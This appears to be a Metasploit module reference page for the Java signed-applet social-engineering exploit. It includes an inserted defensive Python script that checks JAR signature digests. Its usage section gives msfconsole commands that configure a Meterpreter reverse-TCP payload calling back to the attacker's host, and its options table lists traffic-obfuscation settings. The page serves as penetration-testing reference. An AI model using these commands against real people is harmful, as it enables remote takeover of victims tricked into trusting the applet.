Java Signed Applet Social Engineering Code Execution
This exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim's JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the "Publisher" line. Newer JVMs display "UNKNOWN" when the signature is not trusted (i.e., it is not signed by a trusted CA). The SigningCert option allows you to provide a trusted code-signing cert, whose values will override CERTCN. If SigningCert is not given, a randomly generated self-signed cert will be used. Either way, once the user clicks "run", the applet executes with full user permissions.
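The description above turns on what the JVM can and cannot tell the user about a signed applet: a signature exists, but it may come from a self-signed certificate. The following is an added, defender-side example and is not part of this page or of the Metasploit module. It builds a constructed JAR in memory (using the page's default applet name SiteLoader, a stub class, and a placeholder .RSA block rather than a real PKCS#7 signature) and then triages an arbitrary JAR offline: is it signed, does the signature file's manifest digest match the manifest, do the manifest's per-entry digests match the files actually inside the archive, and what `Permissions` value does the manifest request. It uses only the Python standard library.

```python
# Added example (not from the Rapid7 page or the Metasploit module):
# offline triage of a JAR's signature layers. Standard library only.
import base64
import hashlib
import io
import zipfile


def _b64_sha256(data: bytes) -> str:
    return base64.b64encode(hashlib.sha256(data).digest()).decode()


def _parse_manifest(text: str):
    """Split MANIFEST.MF / .SF text into (main_attrs, {entry_name: attrs}).
    JAR spec: a line starting with one space continues the previous line,
    and a blank line separates sections."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    sections = [{}]
    for line in lines:
        if line == "":
            if sections[-1]:
                sections.append({})
            continue
        key, _, value = line.partition(": ")
        sections[-1][key] = value
    sections = [s for s in sections if s]
    main = sections[0] if sections else {}
    named = {s["Name"]: s for s in sections[1:] if "Name" in s}
    return main, named


def build_sample_jar(permissions: str = "all-permissions") -> bytes:
    """Constructed signed-JAR layout: stub class bytes and a placeholder
    .RSA block (NOT a real PKCS#7 signature)."""
    class_name = "SiteLoader.class"
    class_bytes = b"\xca\xfe\xba\xbe" + b"\x00" * 12  # constructed stub
    manifest = (
        "Manifest-Version: 1.0\r\n"
        f"Permissions: {permissions}\r\n\r\n"
        f"Name: {class_name}\r\n"
        f"SHA-256-Digest: {_b64_sha256(class_bytes)}\r\n\r\n"
    ).encode()
    sig_file = (
        "Signature-Version: 1.0\r\n"
        f"SHA-256-Digest-Manifest: {_b64_sha256(manifest)}\r\n\r\n"
    ).encode()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", manifest)
        zf.writestr("META-INF/SITELOAD.SF", sig_file)
        zf.writestr("META-INF/SITELOAD.RSA", b"PLACEHOLDER-PKCS7-BLOCK")
        zf.writestr(class_name, class_bytes)
    return buf.getvalue()


def replace_entry(jar_bytes: bytes, name: str, new_bytes: bytes) -> bytes:
    """Rewrite one entry and leave everything else alone (simulated tampering)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            data = new_bytes if info.filename == name else src.read(info.filename)
            dst.writestr(info.filename, data)
    return out.getvalue()


def inspect_jar(jar_bytes: bytes) -> dict:
    """Report signature presence, digest consistency and requested permissions.
    The .RSA/.DSA/.EC block is not cryptographically verified here; use
    `jarsigner -verify -verbose -certs` for that and for the signer identity."""
    report = {"signed": False, "signature_files": [], "manifest_ok": None,
              "entry_digests_ok": None, "permissions": None, "problems": []}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = zf.namelist()
        if "META-INF/MANIFEST.MF" not in names:
            report["problems"].append("no manifest")
            return report
        manifest_bytes = zf.read("META-INF/MANIFEST.MF")
        main, named = _parse_manifest(manifest_bytes.decode("utf-8"))
        report["permissions"] = main.get("Permissions")
        meta = [n for n in names if n.startswith("META-INF/")]
        sf_names = [n for n in meta if n.upper().endswith(".SF")]
        blocks = [n for n in meta if n.upper().rsplit(".", 1)[-1] in ("RSA", "DSA", "EC")]
        report["signature_files"] = sf_names + blocks
        report["signed"] = bool(sf_names) and bool(blocks)
        if not report["signed"]:
            return report
        ok = True
        for sf_name in sf_names:  # .SF binds the whole manifest by digest
            sf_main, _ = _parse_manifest(zf.read(sf_name).decode("utf-8"))
            if sf_main.get("SHA-256-Digest-Manifest") != _b64_sha256(manifest_bytes):
                ok = False
                report["problems"].append(f"{sf_name}: manifest digest mismatch")
        report["manifest_ok"] = ok
        ok = True
        for name, attrs in named.items():  # manifest binds each file by digest
            digest = attrs.get("SHA-256-Digest")
            if digest is not None and name in names and digest != _b64_sha256(zf.read(name)):
                ok = False
                report["problems"].append(f"{name}: content digest mismatch")
        report["entry_digests_ok"] = ok
    return report


if __name__ == "__main__":
    print(inspect_jar(build_sample_jar()))
    print(inspect_jar(replace_entry(build_sample_jar(), "SiteLoader.class", b"changed")))
```

The two digest layers only show that the archive is internally consistent; whether the signer chains to a trusted CA (the "UNKNOWN" versus named-publisher distinction the description refers to) is decided by the PKCS#7 block, which this script deliberately does not parse. Running `jarsigner -verify -verbose -certs` against a captured applet answers that question and prints the signer's certificate subject.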
Rank
- Excellent
Authors
- natron < natron [at] metasploit.com >
References
- http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith...
- http://www.spikezilla-software.com/blog/?p=21
Exploit Targets
- 0 - Generic (Java Payload)
- 1 - Windows x86 (Native Payload) (default)
- 2 - Linux x86 (Native Payload)
- 3 - Mac OS X PPC (Native Payload)
- 4 - Mac OS X x86 (Native Payload)
Similar Modules
- exploit/multi/browser/firefox_escape_retval
- exploit/multi/browser/firefox_queryinterface
- exploit/multi/browser/itms_overflow
- exploit/multi/browser/java_calendar_deserialize
- exploit/multi/browser/java_getsoundbank_bof
- exploit/multi/browser/java_rhino
- exploit/multi/browser/java_rmi_connection_impl
- exploit/multi/browser/java_setdifficm_bof
- exploit/multi/browser/java_trusted_chain
- exploit/multi/browser/mozilla_compareto
Usage Information
msf > use exploit/multi/browser/java_signed_applet
msf exploit(java_signed_applet) > show payloads
msf exploit(java_signed_applet) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(java_signed_applet) > set LHOST [MY IP ADDRESS]
msf exploit(java_signed_applet) > exploit
Module Options
| Option | Description |
| --- | --- |
| APPLETNAME | The main applet's class name. (default: SiteLoader) |
| CERTCN | The CN= value for the certificate. Cannot contain ',' or '/' (default: SiteLoader) |
| SRVHOST | The local host to listen on. This must be an address on the local machine or 0.0.0.0 (default: 0.0.0.0) |
| SRVPORT | The local port to listen on. (default: 8080) |
| SSL | Negotiate SSL for incoming connections |
| SSLCert | Path to a custom SSL certificate (default is randomly generated) |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3) |
| SigningCert | Path to a signing certificate in PEM or PKCS12 (.pfx) format |
| SigningKey | Path to a signing key in PEM format |
| SigningKeyPass | Password for signing key (required if SigningCert is a .pfx) |
| URIPATH | The URI to use for this exploit (default is random) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EXE::Custom | Use custom exe instead of automatically generating a payload exe |
| EXE::FallBack | Use the default template in case the specified one is missing |
| EXE::Inject | Set to preserve the original EXE function |
| EXE::OldMethod | Set to use the substitution EXE generation method |
| EXE::Path | The directory in which to look for the executable template |
| EXE::Template | The executable template file name |
| EnableContextEncoding | Use transient context when encoding payloads |
| ListenerComm | The specific communication channel to use for this service |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| HTML::base64 | Enable HTML obfuscation via an embedded base64 html object (IE not supported) (accepted: none, plain, single_pad, double_pad, random_space_injection) |
| HTML::javascript::escape | Enable HTML obfuscation via HTML escaping (number of iterations) |
| HTML::unicode | Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be) |
| HTTP::chunked | Enable chunking of HTTP responses via "Transfer-Encoding: chunked" |
| HTTP::compression | Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate) |
| HTTP::header_folding | Enable folding of HTTP headers |
| HTTP::junk_headers | Enable insertion of random junk HTTP headers |
| HTTP::server_name | Configures the Server header of all outgoing replies |
| TCP::max_send_size | Maximum TCP segment size (0 = disable) |
| TCP::send_delay | Delay inserted before every send (0 = disable) |
